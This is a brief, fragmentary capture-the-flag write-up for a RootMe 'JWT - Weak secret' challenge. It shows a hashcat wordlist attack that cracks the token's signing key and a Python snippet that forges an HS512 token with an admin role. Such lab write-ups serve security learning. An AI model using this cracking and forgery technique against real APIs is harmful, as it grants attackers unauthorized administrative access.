JWT weak secret

RootMe challege: JWT - Weak secret: This API with its /hello endpoint (accessible with GET) seems rather welcoming at first glance but is actually trying to play a trick on you. Recover its most valuable secrets!

---

Argh:

┌──(kali㉿kali)-[~/Downloads]
└─$ hashcat -a 0 -m 16500 jwt jwt.secrets.list
hashcat (v6.2.6) starting

# http://challenge01.root-me.org/web-serveur/ch59

import jwt

secret = "secret"
hacked_token = jwt.encode({"role": "admin"}, secret, algorithm="HS512")
print(f"Hacked token:{hacked_token}")

etcetera.

Resources

• JWT techniques (these writeups)